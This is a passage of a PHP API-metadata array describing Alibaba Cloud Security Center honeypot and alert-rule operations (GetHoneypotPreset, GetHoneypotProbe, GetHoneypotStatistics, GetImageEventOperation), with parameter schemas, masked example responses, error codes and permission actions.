true\\\\n}\\",\\n \\"RequestId\\": \\"48F523DA-4C7E-5417-B872-E313E5A4****\\"\\n}","type":"json"}]', 'title' => 'GetHoneypotNodeMetricList', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneypotNodeMetricList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetHoneypotPreset' => [ 'summary' => 'Queries the configurations of a specified honeypot template.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'HoneypotPresetId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot template.'."\n" ."\n" .'> You can call the [ListHoneypotPreset](~~ListHoneypotPreset~~) operation to query the IDs of honeypot templates.'."\n", 'type' => 'string', 'required' => true, 'example' => '207ca117-44b9-495d-84e7-50289b4cxxxx'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about the honeypot template.'."\n", 'type' => 'object', 'properties' => [ 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the honeypot image.'."\n", 'type' => 'string', 'example' => 'ruoyi'], 'PresetName' => ['title' => '', 'description' => 'The custom name of the honeypot template.'."\n", 'type' => 'string', 'example' => 'ssh'], 'HoneypotPresetId' => ['title' => '', 'description' => 'The ID of the honeypot template.'."\n", 'type' => 'string', 'example' => '94fd8805-d178-4361-84d3-de47fb4e****'], 'Meta' => ['title' => '', 'description' => 'The custom configuration of the honeypot template.'."\n", 'type' => 'string', 'example' => '{"trojan_git":"zip","burp":"open","portrait_option":"true"}'], 'FileInfoList' => [ 'title' => '', 'description' => 'An array that consists of the configurations of the uploaded file.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the uploaded file.'."\n", 'type' => 'object', 'properties' => [ 'FileId' => ['description' => 'The ID of the uploaded file.'."\n", 'type' => 'string', 'example' => 'HONEYPOT_FILE/1765_167040128****', 'title' => ''], 'FileName' => ['description' => 'The name of the uploaded file.'."\n", 'type' => 'string', 'example' => 'HONEYPOT_FILE****', 'title' => ''], 'OssUrl' => ['description' => 'The download URL.'."\n", 'type' => 'string', 'example' => 'http://aegis****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'example' => '', ], 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => 'a882e590-b87b-45a6-87b9-d0a3e5a0****'], 'ControlNodeName' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'example' => 'managerNodename'], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the honeypot image.'."\n", 'type' => 'string', 'example' => 'RuoYi'], 'PresetType' => ['title' => '', 'description' => 'The type of the honeypot template. Valid values:'."\n" ."\n" .'* **TEMP**: automatically generated template'."\n" .'* **CUSTOM**: custom template'."\n" .'* **DEFAULT**: default template'."\n", 'type' => 'string', 'example' => 'CUSTOM'], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'success', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '38AFE393-88E8-5642-B3E2-D57C6E76025D', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"HoneypotImageName\\": \\"ruoyi\\",\\n \\"PresetName\\": \\"ssh\\",\\n \\"HoneypotPresetId\\": \\"94fd8805-d178-4361-84d3-de47fb4e****\\",\\n \\"Meta\\": \\"{\\\\\\"trojan_git\\\\\\":\\\\\\"zip\\\\\\",\\\\\\"burp\\\\\\":\\\\\\"open\\\\\\",\\\\\\"portrait_option\\\\\\":\\\\\\"true\\\\\\"}\\",\\n \\"FileInfoList\\": [\\n {\\n \\"FileId\\": \\"HONEYPOT_FILE/1765_167040128****\\",\\n \\"FileName\\": \\"HONEYPOT_FILE****\\",\\n \\"OssUrl\\": \\"http://aegis****\\"\\n }\\n ],\\n \\"NodeId\\": \\"a882e590-b87b-45a6-87b9-d0a3e5a0****\\",\\n \\"ControlNodeName\\": \\"managerNodename\\",\\n \\"HoneypotImageDisplayName\\": \\"RuoYi\\",\\n \\"PresetType\\": \\"CUSTOM\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"success\\",\\n \\"RequestId\\": \\"38AFE393-88E8-5642-B3E2-D57C6E76025D\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'GetHoneypotPreset', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneypotPreset', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotPreset', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotpreset/{#HoneypotPresetId}'], ], ], ], ], ], 'GetHoneypotProbe' => [ 'summary' => 'Queries the details about a specified probe.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '124719', 'abilityTreeNodes' => ['FEATUREsasY2S7U2'], ], 'parameters' => [ [ 'name' => 'ProbeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The probe ID.'."\n" ."\n" .'> You can call the [ListHoneypotProbe](~~ListHoneypotProbe~~) operation to query the IDs of probes.'."\n", 'type' => 'string', 'required' => true, 'example' => 'd6c1ebc9-a90d-4c9e-9490-328814d1ca00'], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The information about the probe.'."\n", 'type' => 'object', 'properties' => [ 'ProbeId' => ['title' => '', 'description' => 'The ID of the probe.'."\n", 'type' => 'string', 'example' => '40f6501d-45ec-4bf0-b813-0072ceb4****'], 'ProbeType' => ['title' => '', 'description' => 'The type of the probe. Valid values:'."\n" ."\n" .'* **host_probe**: host probe'."\n" .'* **vpc_black_hole_probe**: virtual private cloud (VPC) probe'."\n", 'type' => 'string', 'example' => 'host_probe'], 'DisplayName' => ['title' => '', 'description' => 'The name of the probe.'."\n", 'type' => 'string', 'example' => 'test-probe'], 'OsType' => ['title' => '', 'description' => 'The operating system of the server on which the probe is deployed. Valid values:'."\n" ."\n" .'* windows'."\n" .'* linux'."\n", 'type' => 'string', 'example' => 'windows'], 'ProbeVersion' => ['title' => '', 'description' => 'The version of the probe.'."\n", 'type' => 'string', 'example' => '18060096'], 'HostIp' => ['title' => '', 'description' => 'The IP address of the server on which the probe is deployed.'."\n", 'type' => 'string', 'example' => '33.53.XX.XX'], 'ControlNode' => [ 'title' => '', 'description' => 'The information about the management node.'."\n", 'type' => 'object', 'properties' => [ 'NodeId' => ['title' => '', 'description' => 'The ID of the management node.'."\n", 'type' => 'string', 'example' => '37a15ff1-3475-4897-aa6c-f7fd9122****'], 'NodeName' => ['title' => '', 'description' => 'The name of the management node.'."\n", 'type' => 'string', 'example' => 'online-honeypot'], 'EcsInstanceId' => ['title' => '', 'description' => 'The instance ID of the management node.'."\n", 'type' => 'string', 'example' => 'i-bp19ijepxytwtzrk****'], ], 'example' => '', ], 'Ping' => ['title' => '', 'description' => 'Indicates whether ping is enabled for the check type.'."\n", 'type' => 'boolean', 'example' => 'false'], 'Arp' => ['title' => '', 'description' => 'Indicates whether address resolution protocol (ARP) is enabled for the check type.'."\n", 'type' => 'boolean', 'example' => 'true'], 'DeployTime' => ['title' => '', 'description' => 'The time when the probe was deployed.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '1669363825000'], 'Status' => ['title' => '', 'description' => 'The status of the probe. Valid values:'."\n" ."\n" .'* **installed**: installed'."\n" .'* **install_failed**: installation failed'."\n" .'* **online**: online'."\n" .'* **offline**: offline'."\n" .'* **unnormal**: abnormal'."\n" .'* **unprobe**: unauthorized'."\n" .'* **uninstalling**: being uninstalled'."\n" .'* **uninstalled**: uninstalled'."\n" .'* **uninstall_failed**: uninstallation failed'."\n" .'* **not_exist**: not installed'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => 'online'], 'ListenIpList' => [ 'title' => '', 'description' => 'An array consisting of the IP addresses that can be monitored.'."\n", 'type' => 'array', 'items' => ['description' => 'The IP address that can be monitored.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'example' => '', ], 'CpuLoad' => ['title' => '', 'description' => 'The CPU utilization.'."\n", 'type' => 'number', 'format' => 'double', 'example' => '0.51'], 'MemoryLoad' => ['title' => '', 'description' => 'The memory usage.'."\n", 'type' => 'number', 'format' => 'double', 'example' => '1.94'], 'HoneypotProbeBindList' => [ 'title' => '', 'description' => 'The honeypots that are bound to the probe.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details about the service to which the probe forwards traffic.'."\n", 'type' => 'object', 'properties' => [ 'ServiceIpList' => [ 'title' => '', 'description' => 'The IP addresses that are monitored.'."\n", 'type' => 'array', 'items' => ['description' => 'The IP address that is monitored.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'example' => '', ], 'Status' => ['title' => '', 'description' => 'The status of the honeypot that is bound to the probe. Valid values:'."\n" ."\n" .'* **1**: abnormal'."\n" .'* **3**: normal'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3'], 'HoneypotId' => ['title' => '', 'description' => 'The honeypot ID.'."\n", 'type' => 'string', 'example' => '913347774a3b3c378c6a50f66de23dfa097765214ec3f0526b01c67bf59c****'], 'BindPortList' => [ 'description' => 'The ports that are bound to the probe.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details about the port that is bound to the probe.'."\n", 'type' => 'object', 'properties' => [ 'StartPort' => ['title' => '', 'description' => 'The start port on which the probe monitors.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '22'], 'EndPort' => ['title' => '', 'description' => 'The end port on which the probe monitors.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '80'], 'Proto' => ['title' => '', 'description' => 'The type of the protocol.'."\n", 'type' => 'string', 'example' => 'tcp'], 'Fixed' => ['description' => 'Indicates whether the port is a fixed port.'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'TargetPort' => ['description' => 'The destination port.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '80', 'title' => ''], 'Id' => ['description' => 'The unique ID of the port binding record.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '2512', 'title' => ''], 'BindPort' => ['description' => 'Indicates whether the port is bound.'."\n", 'type' => 'boolean', 'example' => 'false', 'title' => ''], 'Err' => ['description' => 'The error that is returned if an error occurred in the port of the honeypot that is bound to the probe.'."\n", 'type' => 'string', 'example' => 'portmap failed', 'title' => ''], 'Msg' => ['description' => 'The error message that is returned if an error occurred in the port of the honeypot that is bound to the probe.'."\n", 'type' => 'string', 'example' => 'listen 22 tcp4 failed', 'title' => ''], 'Status' => ['description' => 'The status of the port of the honeypot that is bound to the probe. Valid values:'."\n" ."\n" .'* **1**: abnormal'."\n" .'* **3**: normal'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'BindId' => ['description' => 'The unique ID of the honeypot that is bound to the probe.'."\n", 'type' => 'string', 'example' => '45378f64-d7b4-4a53-9c48-4303eb4b****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'example' => '', ], 'HoneyPotProbeScanPort' => [ 'description' => 'The ports that the honeypot monitors.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The unique ID of the service that is monitored.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '15389', 'title' => ''], 'ProbeId' => ['description' => 'The ID of the probe.'."\n", 'type' => 'string', 'example' => 'a46f5162-c70d-4e26-8ddf-7435feca****', 'title' => ''], 'ServiceIpList' => [ 'description' => 'The IP addresses that are monitored.'."\n", 'type' => 'array', 'items' => ['description' => 'The IP address that is monitored.'."\n", 'type' => 'string', 'example' => '0.0.0.0', 'title' => ''], 'title' => '', 'example' => '', ], 'Status' => ['description' => 'The monitoring status. Valid values:'."\n" ."\n" .'* **1**: abnormal'."\n" .'* **3**: normal'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '3', 'title' => ''], 'Ports' => ['description' => 'The ports that are monitored.'."\n", 'type' => 'string', 'example' => '{'."\n" .' "tcp": "1-65535",'."\n" .' "udp": "1-65535"'."\n" .'}', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Uuid' => ['description' => 'The UUID of the asset on which the host probe is deployed.'."\n", 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'CanListenIpList' => [ 'description' => 'An array consisting of the IP addresses that can be monitored.'."\n", 'type' => 'array', 'items' => ['description' => 'The IP address that can be monitored.'."\n", 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'title' => '', 'example' => '', ], 'CidrList' => [ 'description' => 'The CIDR blocks of the probe deployed in a virtual private cloud (VPC).'."\n", 'type' => 'array', 'items' => ['description' => 'The CIDR block of the probe deployed in a VPC.'."\n", 'type' => 'string', 'example' => '192.168.0.0/16', 'title' => ''], 'title' => '', 'example' => '', ], 'ProxyIp' => ['description' => 'The IP address of the proxy server.'."\n", 'type' => 'string', 'example' => '47.108.XX.XX', 'title' => ''], 'VpcId' => ['description' => 'The ID of the VPC in which the probe is deployed.'."\n", 'type' => 'string', 'example' => 'vpc-2vchkxmf2j9yjt3x2****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**: The request was successful.'."\n" .'* **false**: The request failed.'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The message returned.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '6550E0E6-FD6C-5F39-AB5E-35B30DCA97B5', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'InvalidParam', 'errorMessage' => 'There was an error with your request.', 'description' => ''], ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"ProbeId\\": \\"40f6501d-45ec-4bf0-b813-0072ceb4****\\",\\n \\"ProbeType\\": \\"host_probe\\",\\n \\"DisplayName\\": \\"test-probe\\",\\n \\"OsType\\": \\"windows\\",\\n \\"ProbeVersion\\": \\"18060096\\",\\n \\"HostIp\\": \\"33.53.XX.XX\\",\\n \\"ControlNode\\": {\\n \\"NodeId\\": \\"37a15ff1-3475-4897-aa6c-f7fd9122****\\",\\n \\"NodeName\\": \\"online-honeypot\\",\\n \\"EcsInstanceId\\": \\"i-bp19ijepxytwtzrk****\\"\\n },\\n \\"Ping\\": false,\\n \\"Arp\\": true,\\n \\"DeployTime\\": 1669363825000,\\n \\"Status\\": 0,\\n \\"ListenIpList\\": [\\n \\"192.168.XX.XX\\"\\n ],\\n \\"CpuLoad\\": 0.51,\\n \\"MemoryLoad\\": 1.94,\\n \\"HoneypotProbeBindList\\": [\\n {\\n \\"ServiceIpList\\": [\\n \\"192.168.XX.XX\\"\\n ],\\n \\"Status\\": 3,\\n \\"HoneypotId\\": \\"913347774a3b3c378c6a50f66de23dfa097765214ec3f0526b01c67bf59c****\\",\\n \\"BindPortList\\": [\\n {\\n \\"StartPort\\": 22,\\n \\"EndPort\\": 80,\\n \\"Proto\\": \\"tcp\\",\\n \\"Fixed\\": false,\\n \\"TargetPort\\": 80,\\n \\"Id\\": 2512,\\n \\"BindPort\\": false,\\n \\"Err\\": \\"portmap failed\\",\\n \\"Msg\\": \\"listen 22 tcp4 failed\\",\\n \\"Status\\": 3\\n }\\n ],\\n \\"BindId\\": \\"45378f64-d7b4-4a53-9c48-4303eb4b****\\"\\n }\\n ],\\n \\"HoneyPotProbeScanPort\\": {\\n \\"Id\\": 15389,\\n \\"ProbeId\\": \\"a46f5162-c70d-4e26-8ddf-7435feca****\\",\\n \\"ServiceIpList\\": [\\n \\"0.0.0.0\\"\\n ],\\n \\"Status\\": 3,\\n \\"Ports\\": \\"{\\\\n \\\\\\"tcp\\\\\\": \\\\\\"1-65535\\\\\\",\\\\n \\\\\\"udp\\\\\\": \\\\\\"1-65535\\\\\\"\\\\n}\\"\\n },\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"CanListenIpList\\": [\\n \\"192.168.XX.XX\\"\\n ],\\n \\"CidrList\\": [\\n \\"192.168.0.0/16\\"\\n ],\\n \\"ProxyIp\\": \\"47.108.XX.XX\\",\\n \\"VpcId\\": \\"vpc-2vchkxmf2j9yjt3x2****\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"6550E0E6-FD6C-5F39-AB5E-35B30DCA97B5\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'GetHoneypotProbe', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneypotProbe', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'HoneypotProbe', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:honeypotprobe/{#HoneypotProbeId}'], ], ], ], ], ], 'GetHoneypotStatistics' => [ 'summary' => 'Get statistics on honey pot usage.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese.'."\n" .'* **en**: English.'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'PlainResult'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The honeypot usage statistics.'."\n", 'type' => 'object', 'properties' => [ 'TotalProbeCount' => ['title' => '', 'description' => 'The total number of authorized probes.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '40'], 'UsedProbeCount' => ['title' => '', 'description' => 'The number of deployed probes.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '15'], 'UsedHostProbeCount' => ['title' => '', 'description' => 'The number of deployed host probes.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '9'], 'UsedVpcProbeCount' => ['title' => '', 'description' => 'The number of deployed VPC probes.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '6'], 'TotalHoneypotCount' => ['title' => '', 'description' => 'The total number of honeypots.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '20'], 'UsedHoneypotCount' => ['title' => '', 'description' => 'The number of deployed honeypots.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '7'], 'TotalNodeStatus' => ['description' => 'The health status of the management node. Valid values:'."\n" ."\n" .'* 1: normal'."\n" .'* 2: abnormal'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The status code that is returned. The status code **200** indicates that the request was successful. Other status codes indicate that the request failed. You can identify the cause of the failure based on the status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => 'EB7181CB-32F3-5189-A935-4E24DD1A****', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"TotalProbeCount\\": 40,\\n \\"UsedProbeCount\\": 15,\\n \\"UsedHostProbeCount\\": 9,\\n \\"UsedVpcProbeCount\\": 6,\\n \\"TotalHoneypotCount\\": 20,\\n \\"UsedHoneypotCount\\": 7,\\n \\"TotalNodeStatus\\": 1\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"EB7181CB-32F3-5189-A935-4E24DD1A****\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', 'title' => 'GetHoneypotStatistics', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetHoneypotStatistics', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GetImageEventOperation' => [ 'summary' => 'Queries alert handling rules.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasF0IRDR'], ], 'parameters' => [ [ 'name' => 'Id', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The primary key of the alert handling rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '814163', 'docRequired' => true], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the content within the request and response. Valid values:'."\n" ."\n" .'* **zh**: Chinese'."\n" .'* **en**: English'."\n", 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'The response parameters.'."\n", 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The returned data.'."\n", 'type' => 'object', 'properties' => [ 'Id' => ['title' => '', 'description' => 'The primary key of the alert handling rule.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '443496'], 'EventType' => ['title' => '', 'description' => 'The alert type. Valid values:'."\n" ."\n" .'* **sensitiveFile**'."\n", 'type' => 'string', 'example' => 'sensitiveFile'], 'OperationCode' => ['title' => '', 'description' => 'The operation code. Valid values:'."\n" ."\n" .'* **whitelist**: added to the whitelist.'."\n", 'type' => 'string', 'example' => 'whitelist'], 'Conditions' => ['title' => '', 'description' => 'The rule conditions. The value is in the JSON format. Valid values of keys:'."\n" ."\n" .'* **condition**: the matching condition.'."\n" .'* **type**: the matching type.'."\n" .'* **value**: the matching value.'."\n", 'type' => 'string', 'example' => '[{\\"condition\\": \\"MD5\\", \\"type\\": \\"equals\\", \\"value\\": \\"0083a31cc0083a31ccf7c10367a6e783e\\"}]'."\n"], 'Scenarios' => ['title' => '', 'description' => 'The application scope of the rule. The value is in the JSON format. Valid values of keys:'."\n" ."\n" .'* **type**'."\n" .'* **value**'."\n", 'type' => 'string', 'example' => '{\\"type\\": \\"repo\\", \\"value\\": \\"test-aaa/shenzhen-repo-01\\"}'."\n"], 'EventKey' => ['title' => '', 'description' => 'The keyword of the alert item.'."\n", 'type' => 'string', 'example' => 'PEM'], 'EventName' => ['title' => '', 'description' => 'The name of the alert item.'."\n", 'type' => 'string', 'example' => 'PEM'], 'Source' => ['description' => 'The source of the whitelist. Valid values:'."\n" ."\n" .'* **default**: image'."\n" .'* **agentless**: agentless detection', 'type' => 'string', 'example' => 'agentless', 'title' => ''], 'Note' => ['description' => 'The remarks.'."\n", 'type' => 'string', 'example' => 'No warning.', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Success' => ['description' => 'Indicates whether the request was successful. Valid values:'."\n" ."\n" .'* **true**'."\n" .'* **false**'."\n", 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The HTTP status code.'."\n", 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The returned message.'."\n", 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '5861EE3E-F0B3-48B8-A5DC-A5080BFB****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'DataNotExists', 'errorMessage' => 'data not exist', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": {\\n \\"Id\\": 443496,\\n \\"EventType\\": \\"sensitiveFile\\",\\n \\"OperationCode\\": \\"whitelist\\",\\n \\"Conditions\\": \\"[{\\\\\\\\\\\\\\"condition\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"MD5\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"type\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"equals\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"value\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"0083a31cc0083a31ccf7c10367a6e783e\\\\\\\\\\\\\\"}]\\\\n\\",\\n \\"Scenarios\\": \\"{\\\\\\\\\\\\\\"type\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"repo\\\\\\\\\\\\\\", \\\\\\\\\\\\\\"value\\\\\\\\\\\\\\": \\\\\\\\\\\\\\"test-aaa/shenzhen-repo-01\\\\\\\\\\\\\\"}\\\\n\\",\\n \\"EventKey\\": \\"PEM\\",\\n \\"EventName\\": \\"PEM\\",\\n \\"Source\\": \\"agentless\\",\\n \\"Note\\": \\"No warning.\\"\\n },\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"5861EE3E-F0B3-48B8-A5DC-A5080BFB****\\"\\n}","type":"json"}]', 'title' => 'GetImageEventOperation', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetImageEventOperation'], ], 'product' => ['code' => 'sas', 'title' => 